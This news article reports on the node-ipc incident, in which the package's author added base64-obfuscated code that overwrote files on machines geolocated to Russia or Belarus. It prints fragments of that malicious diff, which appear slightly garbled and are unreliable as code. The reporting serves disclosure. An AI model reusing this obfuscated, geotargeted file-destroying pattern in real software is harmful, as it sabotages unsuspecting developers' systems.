The developer of a popular open source package was caught adding malicious code to it, causing files to be deleted on computers located in Russia and Belarus. The move was part of an outcry that angered many users and raised concerns about the safety of free, open-source software.
The application, node.ipc, adds remote interprocess communication and neural network capabilities to other open source libraries. As a dependency, node.ipc is automatically downloaded and included in other libraries, including the likes of the Vue.js CLI, which has more than 1 million downloads per week.
A deliberate and dangerous act
Two weeks ago, the author of node.ipc released a new version of the library that sabotages computers in Russia and Belarus, respectively the countries invading Ukraine and providing support for the invasion. The new version added a feature that checks the IP address of developers who have used node.ipc in their own projects. When an IP address is geolocated to Russia or Belarus, the new version deletes files from the machine and replaces them with heart emoticons.
To disguise the malice, node.ipc author Brandon Nozaki Miller base64-coded the changes to make things more difficult for users who want to visually inspect them to check for problems.
Here’s what these developers saw:
+ const n2 = Buffer.from(“Li8=”, “base64”);
+ const o2 = Buffer.from(“Li4v”, “base64”);
+ const r = Buffer.from(“Li4vLi4v”, “base64”);
+ const f = Buffer.from(“Lw==””, “base64”);
+ const c = Buffer.from(“Y291bnRyeV9uYW1l”, “base64”);
+ const e = Buffer.from(“cnVzc2lh”, “base64”);
+ const i = Buffer.from(“YmVsYXJ1cw==””, “base64”);
These lines were then passed to the timer function, such as:
+ h(n2.toString(“utf8”));
The values for the Base64 strings were:
- n2 is set to: ./
- o2 is set to: ../
- r is set to: ../../
- f is set to: /
When they switched to the timer function, the lines were used as inputs to delete files and replace them with the heart emoji.
+ try {
+ import_fs3.default.writeFile(i, c.toString(“utf8”), function() {
+ });
“At this point, a very clear abuse and critical supply chain security incident would occur for any system on which this npm package would be called if it matched a Russia or Belarus geolocation,” wrote Liran Tal, a researcher at Snyk. security company that tracked the changes and published its findings on Wednesday.
